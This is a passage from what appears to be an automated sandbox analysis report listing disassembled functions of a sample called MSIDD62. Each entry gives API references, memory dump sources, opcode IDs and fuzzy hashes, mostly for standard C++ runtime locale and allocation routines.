                                                                      • Instruction Fuzzy Hash: 1601A731A04625EBCB118F50DC05BEEBBB8FB08B10F00423AE811A2690DF789900CA98
                                                                      Function 003FDDD2 Relevance: 7.9, APIs: 5, Instructions: 433COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 003FDDD9
                                                                      • collate.LIBCPMT ref: 003FDF54
                                                                      • numpunct.LIBCPMT ref: 003FE1CE
                                                                        • Part of subcall function 003F83C2: __EH_prolog3.LIBCMT ref: 003F83C9
                                                                        • Part of subcall function 003F815A: __EH_prolog3.LIBCMT ref: 003F8161
                                                                        • Part of subcall function 003F815A: std::_Lockit::_Lockit.LIBCPMT ref: 003F816B
                                                                        • Part of subcall function 003F815A: std::_Lockit::~_Lockit.LIBCPMT ref: 003F81DC
                                                                        • Part of subcall function 003EEAF0: std::_Lockit::_Lockit.LIBCPMT ref: 003EEB1D
                                                                        • Part of subcall function 003EEAF0: std::_Lockit::_Lockit.LIBCPMT ref: 003EEB40
                                                                        • Part of subcall function 003EEAF0: std::_Lockit::~_Lockit.LIBCPMT ref: 003EEB68
                                                                        • Part of subcall function 003EEAF0: std::_Lockit::~_Lockit.LIBCPMT ref: 003EEC07
                                                                        • Part of subcall function 003F4403: Concurrency::cancel_current_task.LIBCPMT ref: 003F44C6
                                                                        • Part of subcall function 003F764B: __EH_prolog3.LIBCMT ref: 003F7652
                                                                        • Part of subcall function 003F764B: std::_Lockit::_Lockit.LIBCPMT ref: 003F765C
                                                                        • Part of subcall function 003F764B: std::_Lockit::~_Lockit.LIBCPMT ref: 003F76CD
                                                                      • __Getcoll.LIBCPMT ref: 003FDF94
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 003EBD10
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 003EBD38
                                                                        • Part of subcall function 003E84C0: LocalAlloc.KERNEL32(00000040,00000000,0040839D,00000000,755CD0F6,?,00000000,?,00000000,?,0042CB8D,000000FF,?,003E17D5,00000000,0042D3BA), ref: 003E84C6
                                                                        • Part of subcall function 003EB9E0: __Getctype.LIBCPMT ref: 003EB9EB
                                                                        • Part of subcall function 003F7A5E: __EH_prolog3.LIBCMT ref: 003F7A65
                                                                        • Part of subcall function 003F7A5E: std::_Lockit::_Lockit.LIBCPMT ref: 003F7A6F
                                                                        • Part of subcall function 003F7A5E: std::_Lockit::~_Lockit.LIBCPMT ref: 003F7AE0
                                                                        • Part of subcall function 003F7B88: __EH_prolog3.LIBCMT ref: 003F7B8F
                                                                        • Part of subcall function 003F7B88: std::_Lockit::_Lockit.LIBCPMT ref: 003F7B99
                                                                        • Part of subcall function 003F7B88: std::_Lockit::~_Lockit.LIBCPMT ref: 003F7C0A
                                                                        • Part of subcall function 003F7DDC: __EH_prolog3.LIBCMT ref: 003F7DE3
                                                                        • Part of subcall function 003F7DDC: std::_Lockit::_Lockit.LIBCPMT ref: 003F7DED
                                                                        • Part of subcall function 003F7DDC: std::_Lockit::~_Lockit.LIBCPMT ref: 003F7E5E
                                                                        • Part of subcall function 003F7D47: __EH_prolog3.LIBCMT ref: 003F7D4E
                                                                        • Part of subcall function 003F7D47: std::_Lockit::_Lockit.LIBCPMT ref: 003F7D58
                                                                        • Part of subcall function 003F7D47: std::_Lockit::~_Lockit.LIBCPMT ref: 003F7DC9
                                                                        • Part of subcall function 003F4403: __EH_prolog3.LIBCMT ref: 003F440A
                                                                        • Part of subcall function 003F4403: std::_Lockit::_Lockit.LIBCPMT ref: 003F4414
                                                                        • Part of subcall function 003F4403: std::_Lockit::~_Lockit.LIBCPMT ref: 003F44BB
                                                                      • codecvt.LIBCPMT ref: 003FE27F
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3$AllocConcurrency::cancel_current_taskGetcollGetctypeLocalcodecvtcollatenumpunct
                                                                      • String ID:
                                                                      • API String ID: 2252558201-0
                                                                      • Opcode ID: e9c99365e21d274417bab99d6dcaa35352f7bff9ed09569ff8b232c7b3e145ed
                                                                      • Instruction ID: 5d1a78a28138d6482a7f1ed789eafe1eca411c3ba5cbd395479cddb22e353b47
                                                                      • Opcode Fuzzy Hash: e9c99365e21d274417bab99d6dcaa35352f7bff9ed09569ff8b232c7b3e145ed
                                                                      • Instruction Fuzzy Hash: 39E108B1D0022EABDB136F668C0667F7AA9EF51350F11452EFA186F2A1EF308D1097D1
                                                                      Function 0041C382 Relevance: 7.7, APIs: 5, Instructions: 202COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __alloca_probe_16.LIBCMT ref: 0041C409
                                                                      • __alloca_probe_16.LIBCMT ref: 0041C4CA
                                                                      • __freea.LIBCMT ref: 0041C531
                                                                        • Part of subcall function 0041B127: HeapAlloc.KERNEL32(00000000,?,?,?,0041AAAA,?,00000000,?,0040C282,?,?,?,?,?,?,003E1668), ref: 0041B159
                                                                      • __freea.LIBCMT ref: 0041C546
                                                                      • __freea.LIBCMT ref: 0041C556
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                      • String ID:
                                                                      • API String ID: 1096550386-0
                                                                      • Opcode ID: a9eb483e9c2a4daa2c8236f88f8d3e44653b76543464b0ebec26e35f7f213c31
                                                                      • Instruction ID: a81a96a0066873c9551e5f9f05b48dd6ebf7df355bbc9d86fcfb8e7b6b7363af
                                                                      • Opcode Fuzzy Hash: a9eb483e9c2a4daa2c8236f88f8d3e44653b76543464b0ebec26e35f7f213c31
                                                                      • Instruction Fuzzy Hash: BA51B372640226BFEF205F65CCC1EFB36AADF44754B15412AFD08D6241EB38EC9186A9
                                                                      Function 003E4A80 Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 169memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LocalAlloc.KERNEL32(00000040,80000022,?,?,?,00000000,?,00000000,?,?), ref: 003E4B05
                                                                      • LocalAlloc.KERNEL32(00000040,7FFFFFFF,?,?,?,00000000,?,00000000,?,?), ref: 003E4B25
                                                                      • LocalFree.KERNEL32(7FFFFFFE,?,?,00000000,?,00000000,?,?), ref: 003E4BAB
                                                                      • LocalFree.KERNEL32(00000000,755CD0F6,00000000,00000000,Function_000492C0,000000FF,?,?,00000000,?,00000000,?,?), ref: 003E4C2D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: Local$AllocFree
                                                                      • String ID: _B>
                                                                      • API String ID: 2012307162-2609873075
                                                                      • Opcode ID: f34fa173b9a98b792d4a8af78372836ed60bab5d525a3b218214c277f6a832ec
                                                                      • Instruction ID: 2de1b3350c29a7e8bd69dcfe26b75e2a6de1fe4bd190da2f77e1e067941a8ecc
                                                                      • Opcode Fuzzy Hash: f34fa173b9a98b792d4a8af78372836ed60bab5d525a3b218214c277f6a832ec
                                                                      • Instruction Fuzzy Hash: 3451D4726042659FC715DF29DC80A6AB7E9EF88320F110B7EF496D76D1DB70E9008794
                                                                      Function 003EC590 Relevance: 7.6, APIs: 5, Instructions: 116COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 003EC5BD
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 003EC5E0
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 003EC608
                                                                      • std::_Facet_Register.LIBCPMT ref: 003EC67D
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 003EC6A7
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                      • String ID:
                                                                      • API String ID: 459529453-0
                                                                      • Opcode ID: 6a8a23382ff9821799d1efdc7dbced7dbe303a7aac9a813a68346e0b746e6fc8
                                                                      • Instruction ID: f58467cb00cdc7d27e817d3d373b13ff58ba8c65001cd0a22d212139365fb6e4
                                                                      • Opcode Fuzzy Hash: 6a8a23382ff9821799d1efdc7dbced7dbe303a7aac9a813a68346e0b746e6fc8
                                                                      • Instruction Fuzzy Hash: 5541E1758106A8DFCF12DF58D841BAEBBB8EF55310F194269E914AB3D2D730AE05CB90
                                                                      Function 003EEAF0 Relevance: 7.6, APIs: 5, Instructions: 109COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 003EEB1D
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 003EEB40
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 003EEB68
                                                                      • std::_Facet_Register.LIBCPMT ref: 003EEBDD
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 003EEC07
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                      • String ID:
                                                                      • API String ID: 459529453-0
                                                                      • Opcode ID: 65a30d840753afdf3962787d73144871633143e68577a4456ba798c4d455a8af
                                                                      • Instruction ID: 9bdc9d889f85e8f44b15e926ecc50c981779ab3dca794beff5e030053352f4eb
                                                                      • Opcode Fuzzy Hash: 65a30d840753afdf3962787d73144871633143e68577a4456ba798c4d455a8af
                                                                      • Instruction Fuzzy Hash: A14102758006AADFCB12CF58D840BAEBBB4FB15720F154269E911AB3D1D730AE04CBD1
                                                                      Function 003EEC30 Relevance: 7.6, APIs: 5, Instructions: 109COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 003EEC5D
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 003EEC80
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 003EECA8
                                                                      • std::_Facet_Register.LIBCPMT ref: 003EED1D
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 003EED47
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                      • String ID:
                                                                      • API String ID: 459529453-0
                                                                      • Opcode ID: 42c90ea1bae2afb3da25f06e36f0f017c68dc06879491d1a8d88bb6bef5dc66b
                                                                      • Instruction ID: fccea4bee252f726d3f3e9e061a2cebbf2f7e3cb879022b6fdd59a1a39d545e6
                                                                      • Opcode Fuzzy Hash: 42c90ea1bae2afb3da25f06e36f0f017c68dc06879491d1a8d88bb6bef5dc66b
                                                                      • Instruction Fuzzy Hash: 4B41F2758006A9DFCB12CF58D840BAEBBB4FB15720F254669E915AB3D1D730AE04CBD1
                                                                      Function 003EED70 Relevance: 7.6, APIs: 5, Instructions: 109COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 003EED9D
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 003EEDC0
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 003EEDE8
                                                                      • std::_Facet_Register.LIBCPMT ref: 003EEE5D
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 003EEE87
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                      • String ID:
                                                                      • API String ID: 459529453-0
                                                                      • Opcode ID: 5d6637c0ef350a7cf54480da6113a8b06af39a9042ed3b5c6186b33cc40c1f6c
                                                                      • Instruction ID: be782f78b857f05a65a3c4a2ab15fd43dafc322604fdaa037af66504f62021e3
                                                                      • Opcode Fuzzy Hash: 5d6637c0ef350a7cf54480da6113a8b06af39a9042ed3b5c6186b33cc40c1f6c
                                                                      • Instruction Fuzzy Hash: 1E4112358006A9DFCB12CF58D880BAEBBB4FB46724F154669E911AB3D1D730AE44CBD1
                                                                      Function 003E7C30 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 83COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetLastError.KERNEL32(00000010,00000010,?,003E7912,?,?), ref: 003E7C37
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast
                                                                      • String ID: Call to ShellExecuteEx() returned:$Last error=$false$true
                                                                      • API String ID: 1452528299-1782174991
                                                                      • Opcode ID: 79efe6e6695009734fc3a6a78e5746046e81cdbddfe8f420322e3fd20832c0d7
                                                                      • Instruction ID: 871c3997bd9ff802e8a30831cf0103079e591890ad857ddaae2b0e23e4c4653a
                                                                      • Opcode Fuzzy Hash: 79efe6e6695009734fc3a6a78e5746046e81cdbddfe8f420322e3fd20832c0d7
                                                                      • Instruction Fuzzy Hash: 61215E49A102A286CB751F3E8400335A2F4EF58745F66596FD9C9D7390E76A8CC28398
                                                                      Function 003F6FF9 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: Maklocstr$Maklocchr
                                                                      • String ID:
                                                                      • API String ID: 2020259771-0
                                                                      • Opcode ID: c739c0f014648ad25c53aac11328dfe2944b87461b771100eefe1af00b1a32eb
                                                                      • Instruction ID: 017c55bf730fda4f8fe3a4d62100dc66d2b73d571cb5681f51821be6b2f61c13
                                                                      • Opcode Fuzzy Hash: c739c0f014648ad25c53aac11328dfe2944b87461b771100eefe1af00b1a32eb
                                                                      • Instruction Fuzzy Hash: FB119EB1608749BBE721DBA59881F22B7ECFF08350F04491AF289CBA41D7B5FC5087A4
                                                                      Function 003F75B6 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 003F75BD
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 003F75C7
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 003EBD10
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 003EBD38
                                                                      • codecvt.LIBCPMT ref: 003F7601
                                                                      • std::_Facet_Register.LIBCPMT ref: 003F7618
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 003F7638
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
                                                                      • String ID:
                                                                      • API String ID: 712880209-0
                                                                      • Opcode ID: 9906ea01a827c83c24b5d5ef42d951c89ea7261d2c4ba62f588b139434bb2f2a
                                                                      • Instruction ID: 1ac3f3269c9568523e41495462556af425a25e767d2d976873dc87842e3ff163
                                                                      • Opcode Fuzzy Hash: 9906ea01a827c83c24b5d5ef42d951c89ea7261d2c4ba62f588b139434bb2f2a
                                                                      • Instruction Fuzzy Hash: 8201C07590466D9BCF06EBA8D805ABEB761AF95310F240119E611AF3D2DF349E02CB84
                                                                      Function 003F764B Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 003F7652
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 003F765C
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 003EBD10
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 003EBD38
                                                                      • codecvt.LIBCPMT ref: 003F7696
                                                                      • std::_Facet_Register.LIBCPMT ref: 003F76AD
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 003F76CD
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
                                                                      • String ID:
                                                                      • API String ID: 712880209-0
                                                                      • Opcode ID: 52cfae72c2f21bf269ba40245c245283864d1a056582298135b834a750dffa7f
                                                                      • Instruction ID: cc54de523aff93619678fc1c0b2fd2e23b3a92b4bf8052024205505dbb33ac8b
                                                                      • Opcode Fuzzy Hash: 52cfae72c2f21bf269ba40245c245283864d1a056582298135b834a750dffa7f
                                                                      • Instruction Fuzzy Hash: 6101D635904A1D8BCF06EBA4D845ABEB761AF94311F254119E610AF3D2DF349E018BD4
                                                                      Function 003F7775 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 003F777C
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 003F7786
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 003EBD10
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 003EBD38
                                                                      • collate.LIBCPMT ref: 003F77C0
                                                                      • std::_Facet_Register.LIBCPMT ref: 003F77D7
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 003F77F7
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercollate
                                                                      • String ID:
                                                                      • API String ID: 1007100420-0
                                                                      • Opcode ID: b81184a2090bf31599446fd95d618f521e34d05260bd3c6bfb4f541ccaf5a683
                                                                      • Instruction ID: bc20fce5646580ec70c2d8e973435b8653f62bebf9a357bcf522375196cd029c
                                                                      • Opcode Fuzzy Hash: b81184a2090bf31599446fd95d618f521e34d05260bd3c6bfb4f541ccaf5a683
                                                                      • Instruction Fuzzy Hash: F301C07590462DDBCF06EB64D8466BEB771AF84310F24055AE621AB3D2CF349E028BD4
                                                                      Function 003F780A Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 003F7811
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 003F781B
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 003EBD10
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 003EBD38
                                                                      • ctype.LIBCPMT ref: 003F7855
                                                                      • std::_Facet_Register.LIBCPMT ref: 003F786C
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 003F788C
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registerctype
                                                                      • String ID:
                                                                      • API String ID: 83828444-0
                                                                      • Opcode ID: 708a94cd5c1a1492011816698d3222fe552cbe03e114d22f59810132ff3bf32e
                                                                      • Instruction ID: c37fa14da52cc098c79c121af19f2f960696fc54704db6017be07d9bf503eaee
                                                                      • Opcode Fuzzy Hash: 708a94cd5c1a1492011816698d3222fe552cbe03e114d22f59810132ff3bf32e
                                                                      • Instruction Fuzzy Hash: 9C01D27590466ECBCF06EBA4D8466BEB771AF84310F24051AE611AF2D2DF349E01CB84
                                                                      Function 003F789F Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 003F78A6
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 003F78B0
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 003EBD10
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 003EBD38
                                                                      • messages.LIBCPMT ref: 003F78EA
                                                                      • std::_Facet_Register.LIBCPMT ref: 003F7901
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 003F7921
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermessages
                                                                      • String ID:
                                                                      • API String ID: 2750803064-0
